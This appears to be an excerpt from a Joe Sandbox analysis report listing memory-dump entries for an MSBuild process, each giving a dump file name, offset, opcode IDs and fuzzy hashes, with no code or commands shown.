                                                                                                                                                                                            • Source File: 0000000E.00000002.2564843132.0000000002BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_14_2_2ba0000_MSBuild.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 52afd1c1692ec040eee47b4004b2dfad5d26d60b0b78c0d4bdf6ffb9a82e1556
                                                                                                                                                                                            • Instruction ID: 5dc6fe0905da652657d5cf15cd13d928c95024ad4eb872327550fcd55e566352
                                                                                                                                                                                            • Opcode Fuzzy Hash: 52afd1c1692ec040eee47b4004b2dfad5d26d60b0b78c0d4bdf6ffb9a82e1556
                                                                                                                                                                                            • Instruction Fuzzy Hash: 0E51B0B04797128FE2042B20B2AE43EBFA5FB1F3137916D80F01E99895CF346494CA19
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000E.00000002.2564843132.0000000002BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_14_2_2ba0000_MSBuild.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 282ca521775d3b26aab8b96f5d089e36dfd4e40fdf51443469f5abafc42fcce3
                                                                                                                                                                                            • Instruction ID: a0766b43518948053f02315b72ccc9168c676bcac5d2c1713039432d27eb6f9a
                                                                                                                                                                                            • Opcode Fuzzy Hash: 282ca521775d3b26aab8b96f5d089e36dfd4e40fdf51443469f5abafc42fcce3
                                                                                                                                                                                            • Instruction Fuzzy Hash: 0E613474D01319DFDB14DFA4DA546EDBBB2FF88304F208569E809AB298DB345986CF40
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000E.00000002.2564843132.0000000002BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_14_2_2ba0000_MSBuild.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 678fff9e2bba80fc1110b4066f0f15081405c98385a3d67a40a26b0621beaa94
                                                                                                                                                                                            • Instruction ID: cbc20e21683389bd4d4d1be43245f15325f42c5759618e5520640a46625ddc5f
                                                                                                                                                                                            • Opcode Fuzzy Hash: 678fff9e2bba80fc1110b4066f0f15081405c98385a3d67a40a26b0621beaa94
                                                                                                                                                                                            • Instruction Fuzzy Hash: E051A574E012089FDB48DFA9D5949DDBBF2FF89310F209169E419AB364DB30A901CF10
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000E.00000002.2564843132.0000000002BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_14_2_2ba0000_MSBuild.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: b34c88888643226bc384f503def99800764ea2435cf4d66f4a2cff3438298541
                                                                                                                                                                                            • Instruction ID: 52ff2c5dd7b3598ad80b670546c21f14cc23554f3629fc300a45e8bce69f12b9
                                                                                                                                                                                            • Opcode Fuzzy Hash: b34c88888643226bc384f503def99800764ea2435cf4d66f4a2cff3438298541
                                                                                                                                                                                            • Instruction Fuzzy Hash: CA51A378E01208DFCB48DFA9D59099DBBF2FF89304F209469E819AB364DB31A945CF40
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000E.00000002.2564843132.0000000002BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_14_2_2ba0000_MSBuild.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: a52b94a221947549c357d560377830432adb5294ca64a1442eee2f65d2589277
                                                                                                                                                                                            • Instruction ID: 43c2e88f3ec6c83a17d7786c2f37be538cdba74852c58da2aef39748d44a17c3
                                                                                                                                                                                            • Opcode Fuzzy Hash: a52b94a221947549c357d560377830432adb5294ca64a1442eee2f65d2589277
                                                                                                                                                                                            • Instruction Fuzzy Hash: 3B519A74E05228CFCB64DF68D994BEDBBB2BB49305F1054EAE409A7250DB35AE85CF10
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000E.00000002.2564843132.0000000002BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_14_2_2ba0000_MSBuild.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 76740d114dbb31a5fa199d2f525ae504b4488258d1304b6ca76f7927319e24d5
                                                                                                                                                                                            • Instruction ID: 88ab32f1543dcf4eb9bfb76a9a86da66313c0915e0584d7e4262bf84f3072794
                                                                                                                                                                                            • Opcode Fuzzy Hash: 76740d114dbb31a5fa199d2f525ae504b4488258d1304b6ca76f7927319e24d5
                                                                                                                                                                                            • Instruction Fuzzy Hash: 3F419231A08A49DFCF11CFA8C854B9DBFB2EF49354F048196E8169B2A1E335D954DBA0
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000E.00000002.2564843132.0000000002BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_14_2_2ba0000_MSBuild.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: d7e28a3b23f4077866e7c7586478be464fec4eece1d5b481a539668da46bb793
                                                                                                                                                                                            • Instruction ID: 09df6cd4416041082486a26511e580cc42a390659bf186fab4ff44f65d56738c
                                                                                                                                                                                            • Opcode Fuzzy Hash: d7e28a3b23f4077866e7c7586478be464fec4eece1d5b481a539668da46bb793
                                                                                                                                                                                            • Instruction Fuzzy Hash: B93161316092099FCB099F64D554AAF3FB7EF88304F0044A5F91987290CB79DC61CBD4
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000E.00000002.2564843132.0000000002BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_14_2_2ba0000_MSBuild.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 3adbbec504dc2beac082401987e25a6d72159be2e33b888a2fba7f9e1a74841c
                                                                                                                                                                                            • Instruction ID: c9bb94e6d891f3449f87fc520d2ec1049d423667b2accb5ccb5644b832a8d04f
                                                                                                                                                                                            • Opcode Fuzzy Hash: 3adbbec504dc2beac082401987e25a6d72159be2e33b888a2fba7f9e1a74841c
                                                                                                                                                                                            • Instruction Fuzzy Hash: 14219D3930C2004BEB15562589A4B7EB69BDFC4618F1440F9E506CB798EF25C882E681
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000E.00000002.2564843132.0000000002BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_14_2_2ba0000_MSBuild.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 504390d50ee214c5842faa41f29321158c9ae416f4a2ed6b2f7e709773061c3e
                                                                                                                                                                                            • Instruction ID: 5d3253a2156df0b653daafdea44b1a22f991fe1fec8d7ba68b23a0b7c2b174bd
                                                                                                                                                                                            • Opcode Fuzzy Hash: 504390d50ee214c5842faa41f29321158c9ae416f4a2ed6b2f7e709773061c3e
                                                                                                                                                                                            • Instruction Fuzzy Hash: 06318471E046098FCB04CF6DC8949AEBBF6FF88354B158299E515DB3A5CB349D42CBA0
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000E.00000002.2564843132.0000000002BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_14_2_2ba0000_MSBuild.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 4e87e97ed4ca75151f8bacc3ec5fd35bb4739d2147e972ca58be1a97be3f4d17
                                                                                                                                                                                            • Instruction ID: 704c3cdfdb08b5a869d769a38eadab5665b01e07236b2515a0dae8d3479b37c4
                                                                                                                                                                                            • Opcode Fuzzy Hash: 4e87e97ed4ca75151f8bacc3ec5fd35bb4739d2147e972ca58be1a97be3f4d17
                                                                                                                                                                                            • Instruction Fuzzy Hash: 8731E334A08209CFDB19DF64E6546AE3BB2EF88314F0044E5F8099B291CB74CD55CB98
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000E.00000002.2564843132.0000000002BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_14_2_2ba0000_MSBuild.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: fff0dc83c70460eb4844a7c03feaf5588067133ad0657684a165d565126a5cae
                                                                                                                                                                                            • Instruction ID: 3a642bdd3257c4ffa7f3c5925a07461738812d503ea7b76b2ae797a55ef669a1
                                                                                                                                                                                            • Opcode Fuzzy Hash: fff0dc83c70460eb4844a7c03feaf5588067133ad0657684a165d565126a5cae
                                                                                                                                                                                            • Instruction Fuzzy Hash: A7210435B0A6118FC3299A24D5A462E7BA3FF89365B4581E9E807CB390CF30CC46CBC4
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000E.00000002.2564843132.0000000002BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_14_2_2ba0000_MSBuild.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 16573e40fdc4791ecbb17f6fbb6fcf078a2fa12fb74c5dfed72788c93ad72156
                                                                                                                                                                                            • Instruction ID: 7ac8b68079e916d35f5b63d206ea09a552bb5c9995277d9dbcb4b59b5fd5c804
                                                                                                                                                                                            • Opcode Fuzzy Hash: 16573e40fdc4791ecbb17f6fbb6fcf078a2fa12fb74c5dfed72788c93ad72156
                                                                                                                                                                                            • Instruction Fuzzy Hash: 5521C175A002059FCB14DF34C461AAE77B6EF98664F50C459DC4A8B344EB35EA42CBD2
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000E.00000002.2563506442.00000000029CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 029CD000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_14_2_29cd000_MSBuild.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: c2f582a683f2809a1fb12dc44aeb1561e85a4cfe318679f0836d45a58c818772
                                                                                                                                                                                            • Instruction ID: a4191ecd7152ac3801e84a6fc4dc972fa55cd13ee933c7f1eaca9e77b23da5cd
                                                                                                                                                                                            • Opcode Fuzzy Hash: c2f582a683f2809a1fb12dc44aeb1561e85a4cfe318679f0836d45a58c818772
                                                                                                                                                                                            • Instruction Fuzzy Hash: 73314F7550E3C08FD703CB24C894715BF71AB47214F29C5DBD8898F6A3C22A984ACB62
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000E.00000002.2563506442.00000000029CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 029CD000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_14_2_29cd000_MSBuild.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 1e96209f2a65c854de66787630b820cf6a457228c90214da30f0998c69424641
                                                                                                                                                                                            • Instruction ID: 9760fbe3ab01b35f8b77e8b292f8a636ee483ddfa7e247bc5b9a8dbe69031799
                                                                                                                                                                                            • Opcode Fuzzy Hash: 1e96209f2a65c854de66787630b820cf6a457228c90214da30f0998c69424641
                                                                                                                                                                                            • Instruction Fuzzy Hash: 9121F2715042049FDB14DF28C9C4B26BB65FB88324F30C9BDE8494B356C77AD446CA72
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000E.00000002.2564843132.0000000002BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_14_2_2ba0000_MSBuild.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 8fbeb9010481f13e29ec061571cc5e06235f429732088610a47cdaa06ff6b5cf
                                                                                                                                                                                            • Instruction ID: d2d4d7249b5a54f918d007296e99ff46517b886694257ab3b43b45758d08d058
                                                                                                                                                                                            • Opcode Fuzzy Hash: 8fbeb9010481f13e29ec061571cc5e06235f429732088610a47cdaa06ff6b5cf
                                                                                                                                                                                            • Instruction Fuzzy Hash: ED319478E11308DFCB44DFA8E59489DBBB6FF49305B2094A9E819AB364D731AD05CF40
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000E.00000002.2564843132.0000000002BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_14_2_2ba0000_MSBuild.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: ff97b7de974f304e8559aa832f788b88fe2030f6388a6c17e338bf1a58533368
                                                                                                                                                                                            • Instruction ID: 02b40969ef884a38867a2b29ecd10a3e3762ce689f7129725309265b9b28f7a5
                                                                                                                                                                                            • Opcode Fuzzy Hash: ff97b7de974f304e8559aa832f788b88fe2030f6388a6c17e338bf1a58533368
                                                                                                                                                                                            • Instruction Fuzzy Hash: 4721C670D042469FDB46DF78D69169DBFF1FF45304F0495B9D0149F269EB341A0A8B81
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000E.00000002.2564843132.0000000002BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_14_2_2ba0000_MSBuild.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 2eb40a6dab87b28f3229d8e5033271173fa683361cf799f6ce2a31b23a320475
                                                                                                                                                                                            • Instruction ID: 7954d626096395254536dbee9a10eea13c0aac01cc2ac178f1b6482ff1bd7eca
                                                                                                                                                                                            • Opcode Fuzzy Hash: 2eb40a6dab87b28f3229d8e5033271173fa683361cf799f6ce2a31b23a320475
                                                                                                                                                                                            • Instruction Fuzzy Hash: 6C11C231B056118FD7299A29D4A4A2EBBA6FF8466174940E8E907CB390DF20DC42C7D4
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000E.00000002.2564843132.0000000002BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_14_2_2ba0000_MSBuild.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 7368757048472adb568e8b31478e0363fa03ecc32636adf8d410e329641a6a80
                                                                                                                                                                                            • Instruction ID: 4e0cd5de928ecdf7bc8b22b2f5e7b2550596e25f4c458d25838fbe1e15645539
                                                                                                                                                                                            • Opcode Fuzzy Hash: 7368757048472adb568e8b31478e0363fa03ecc32636adf8d410e329641a6a80
                                                                                                                                                                                            • Instruction Fuzzy Hash: 05111F70D0410A9FDB45EFB9D65179EBBF2FF84304F10D5A9D0189B368EB705A498B81
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000E.00000002.2564843132.0000000002BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_14_2_2ba0000_MSBuild.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 85cf80788525baebb0faf0e31fce7143bbd3b8b9ea35d842fd778b1fd1945070
                                                                                                                                                                                            • Instruction ID: 1092aa8590a761794c01470c5e04dfedb3e825260941ba7688ef342b34192f87
                                                                                                                                                                                            • Opcode Fuzzy Hash: 85cf80788525baebb0faf0e31fce7143bbd3b8b9ea35d842fd778b1fd1945070
                                                                                                                                                                                            • Instruction Fuzzy Hash: A621E4B4C142099FDB40EFA8D9955EEBFF4FB09300F10956AD805B3250EB301A86CBA5
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000E.00000002.2564843132.0000000002BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_14_2_2ba0000_MSBuild.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 56651f1f59a871eda953fe9b3305243f0066253916aeefd8cf7c38bc1ca72c32
                                                                                                                                                                                            • Instruction ID: 01222197d7e3c5b3eeae11b81ed3399202b6d348191bd8471953fbe339688fdd
                                                                                                                                                                                            • Opcode Fuzzy Hash: 56651f1f59a871eda953fe9b3305243f0066253916aeefd8cf7c38bc1ca72c32
                                                                                                                                                                                            • Instruction Fuzzy Hash: EA214774C142098FCB10EFA8D9595EEBFF0FF49314F1041AAD805B72A4EB301A85CBA5
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000E.00000002.2564843132.0000000002BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_14_2_2ba0000_MSBuild.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: c2c516f7787b5be2e0cd246ca9b75c48c95e060c84dd075e1be146faea66a18f
                                                                                                                                                                                            • Instruction ID: 7189acd016d4e4908edd736e78b536cca852ddf2971004ddcaba3f8c7f74b3ba
                                                                                                                                                                                            • Opcode Fuzzy Hash: c2c516f7787b5be2e0cd246ca9b75c48c95e060c84dd075e1be146faea66a18f
                                                                                                                                                                                            • Instruction Fuzzy Hash: 2001F132B040146FDB169E68A810BEE3FA7DFC8350F5880AAF904D7280DB319D028BA4
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000E.00000002.2564843132.0000000002BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_14_2_2ba0000_MSBuild.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: eb9d42537c60ed64ee8b4db2ea2a7087493f093eb813213e0a25bc750aa0ec62
                                                                                                                                                                                            • Instruction ID: e035bdaf29494245de02854ff81e520e2e719ddba378ed7091afece2fe9c83a5
                                                                                                                                                                                            • Opcode Fuzzy Hash: eb9d42537c60ed64ee8b4db2ea2a7087493f093eb813213e0a25bc750aa0ec62
                                                                                                                                                                                            • Instruction Fuzzy Hash: A7E02633C2026A66CB0097B4AC405EEFF38FF96220F448551D0A432000FF70264AC3E1
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000E.00000002.2564843132.0000000002BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_14_2_2ba0000_MSBuild.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 24b99390784549bf28c8145af01d63eb2fe3fc1c7a1e2c0a6dc118c6fa9cb5a1
                                                                                                                                                                                            • Instruction ID: 9881684e2ac1c203c46f0e201e92faa7cd433983539ecb409d52f3263c0f21e1
                                                                                                                                                                                            • Opcode Fuzzy Hash: 24b99390784549bf28c8145af01d63eb2fe3fc1c7a1e2c0a6dc118c6fa9cb5a1
                                                                                                                                                                                            • Instruction Fuzzy Hash: 84D05B31D2022B57CB00E7A5DC044EFF738EED5265B908626D55437140FB702659C7E1
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000E.00000002.2564843132.0000000002BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_14_2_2ba0000_MSBuild.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                                                                                                                                                                            • Instruction ID: afcab9914e60e091a839dde4dff55645f3270c286d06d15a05b819f2c972222e
                                                                                                                                                                                            • Opcode Fuzzy Hash: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                                                                                                                                                                            • Instruction Fuzzy Hash: 7BC08C3320C2282FA638108F7C40EB3BB8CC3C13F4A2501B7F99CE3600A8429C8041F8
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000E.00000002.2564843132.0000000002BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_14_2_2ba0000_MSBuild.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: b222454f6339497f10e44212fe033154b9f3deaeb882381e40414314ce4a5999
                                                                                                                                                                                            • Instruction ID: 150611415034e1e752bab0f9468be87c8396ad8165b3cfdb7269f9d5788b7f19
                                                                                                                                                                                            • Opcode Fuzzy Hash: b222454f6339497f10e44212fe033154b9f3deaeb882381e40414314ce4a5999
                                                                                                                                                                                            • Instruction Fuzzy Hash: 57D0677AB510189FCB049F9CE880CDDBBB6FF9C221B048156F915A3261C6319961DB94
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000E.00000002.2564843132.0000000002BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_14_2_2ba0000_MSBuild.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: c77bd5c26b242086ec122ffead9c1f1798c9955ffc5c20572aba67bd6d26e041
                                                                                                                                                                                            • Instruction ID: be4dd387ad3e8be1865dab7f9f9d9f92f30e2097e51ee250dc9a244e4e0e4b36
                                                                                                                                                                                            • Opcode Fuzzy Hash: c77bd5c26b242086ec122ffead9c1f1798c9955ffc5c20572aba67bd6d26e041
                                                                                                                                                                                            • Instruction Fuzzy Hash: 7AD06778D54118CBCF20DF64EA552ECBBB0EB95311F0014E7E819B2250DB305E908F15
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000E.00000002.2564843132.0000000002BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_14_2_2ba0000_MSBuild.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: e89b0bc68e341420b79a70248216d4c79dbfa4aa658f57043407a026edba64a1
                                                                                                                                                                                            • Instruction ID: f1ccaa7262cc5f1ebc2128cf61925ae907b41cfd9f222c4ab7a302bf4a0d6e49
                                                                                                                                                                                            • Opcode Fuzzy Hash: e89b0bc68e341420b79a70248216d4c79dbfa4aa658f57043407a026edba64a1
                                                                                                                                                                                            • Instruction Fuzzy Hash: 40D05B718083414EC702F770DF526553B36FA82304FD455F6E8014691EEB78484C8B54
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000E.00000002.2564843132.0000000002BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_14_2_2ba0000_MSBuild.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: ee0afbce597f9722163949f13cc9723c0579a31dc5f20855cfebf1844dc5a23d
                                                                                                                                                                                            • Instruction ID: 26d8ac0f14f0c3a5ac429442a4afb7c80a23f011d252e2d7392ca3c60a4296bb
                                                                                                                                                                                            • Opcode Fuzzy Hash: ee0afbce597f9722163949f13cc9723c0579a31dc5f20855cfebf1844dc5a23d
                                                                                                                                                                                            • Instruction Fuzzy Hash: DCC0123055430A4FC501F775EB47A597B1EFAC1304F4055A0F0090752DEF74684C4694
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000E.00000002.2564843132.0000000002BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: false
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_14_2_2ba0000_MSBuild.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: Xcq$$_q
                                                                                                                                                                                            • API String ID: 0-1352256499
                                                                                                                                                                                            • Opcode ID: 1636f0406e926c2935d252427af27bea5b9d3ec96fbe06ff1c45d45aeb19ff54
                                                                                                                                                                                            • Instruction ID: 593334d3b0b25c02eb4639879d55d4a9af9a919f215fdfeea8e956d73411afc8
                                                                                                                                                                                            • Opcode Fuzzy Hash: 1636f0406e926c2935d252427af27bea5b9d3ec96fbe06ff1c45d45aeb19ff54
                                                                                                                                                                                            • Instruction Fuzzy Hash: 1EA1C474F092589BCB489B78946567EBBB3BFC9710B55889DD407E7388CE34AC02CB91
